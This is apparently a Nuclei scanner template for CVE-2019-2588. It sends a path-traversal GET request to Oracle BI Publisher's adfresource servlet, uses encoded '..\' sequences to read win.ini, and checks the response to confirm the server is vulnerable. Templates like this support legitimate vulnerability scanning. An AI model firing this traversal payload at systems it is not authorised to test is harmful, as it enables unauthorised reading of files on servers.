id: CVE-2019-2588 info: name: Oracle Business Intelligence Path Traversal author: madrobot severity: high tags: cve,cve2019,oracle,traversal reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html description: | Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security) requests: - method: GET path: - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini" matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' - type: status status: - 200